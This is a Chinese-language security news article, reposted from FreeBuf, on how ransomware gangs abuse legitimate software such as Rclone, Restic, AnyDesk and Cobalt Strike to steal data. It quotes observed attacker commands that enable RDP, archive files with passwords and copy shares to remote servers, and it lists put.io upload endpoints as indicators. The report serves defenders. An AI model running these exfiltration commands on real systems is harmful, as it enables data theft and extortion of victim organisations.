勒索软件团伙在攻击中使用了越来越多的数据泄露工具,赛门铁克在三个月内就发现了十几种不同的工具进行数据泄露。虽然其中一些工具是恶意软件,但绝大多数都是合法软件。
现在大多数勒索软件运营商都会使用双重勒索进行攻击。除了加密文件外,攻击者也会从受害者处窃取数据并威胁受害者泄露数据。该策略已经被一再证明有效,为攻击者提供了更多的敲诈资本,对付那些能够从备份中恢复数据的组织。
勒索软件团伙应用数据泄露工具的范围正在扩大,主要驱动因素有两个:
-
攻击者意识到了某些软件的潜在功能可以利用 -
攻击者希望找到过于显眼的攻击工具的替代品
-
Rclone:Rclone 是管理云上数据内容的开源工具,经常被勒索软件团伙用于窃取数据。 -
AnyDesk:AnyDesk 是合法的远程管理软件,攻击者可以远程访问失陷主机。 -
RDP:远程桌面协议,使攻击者可以连接到并控制另一台计算机。
reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name=[NAME] RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
-
Cobalt Strike:可以执行命令、注入进程、提升权限。该工具可以作为合法渗透测试工具使用,但被各种攻击者滥用。攻击者利用 Cobalt Strike 的 Beacon 与失陷主机建立通信,支持攻击者秘密地泄露敏感数据。工具模拟正常的网络流量并和正常的网络流量混合在一起,攻击者就可以外传有价值的数据。 -
ConnectWise:远程桌面管理工具,用于实现对失陷主机的远程访问。 -
Atera:攻击者经常滥用的合法远程访问软件。 -
WinRAR:用于压缩和解压的软件,攻击者使用此类软件压缩回传的数据。
cmd /u [REMOVED] CSIDL_COMMON_APPDATArar.exe a -dh -hp[REMOVED] -m5 CSIDL_COMMON_APPDATA1.rar CSIDL_COMMON_APPDATA1.txt > CSIDL_COMMON_APPDATAlog.txt
-
Restic:开源备份工具,适用于各种平台(Windows、Linux 和 OSX)。Restic 支持各种存储后端,包括本地文件系统、SFTP 服务器、Amazon S3、Microsoft Azure 和 Google Cloud Storage 等。
CSIDL_COMMON_VIDEOrestic.exe -r rest:http://[REMOVED]:8000/ init [REMOVED] CSIDL_COMMON_VIDEOppp.txt
CSIDL_COMMON_VIDEOrestic.exe -r rest:http://[REMOVED]:8000/ [REMOVED] CSIDL_COMMON_VIDEOppp.txt --use-fs-snapshot --verbose backup "CSIDL_SYSTEM_DRIVE[REMOVED]"
-
TightVNC:开源远程管理软件。 -
WinSCP:Windows 平台下 SFTP/FTP 客户端。 -
Pandora RC:从前被称为 eHorus 的合法远程管理工具, -
Chisel:开源代理工具,能够创建加密隧道。攻击者创建从失陷主机到攻击基础设施的隧道,通过 HTTP 传输并通过 SSH 进行加密。 -
PowerShell:在各种勒索软件攻击行动中常被攻击者使用的脚本工具,包括 Compress-Archive cmdlet:
powershell Compress-Archive CSIDL_PROFILEpublic[REMOVED]-fs CSIDL_PROFILEpublic[REMOVED]-fs.zip
rclone copy \[REMOVED][REMOVED]Shares --max-age 2095d [REMOVED]:[REMOVED]/ -P --exclude "*.{zip,log,rar,wav,mp4,mpeg}" --ignore-existing --auto-confirm --multi-thread-streams 6 --transfers 6
-
https://api.put[.]io -
https://s100.put[.]io -
https://s101.put[.]io -
https://s102.put[.]io -
https://s103.put[.]io -
https://upload.put[.]io
原文始发于微信公众号(FreeBuf):分析发现勒索软件数据泄露主要依靠滥用合法软件
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论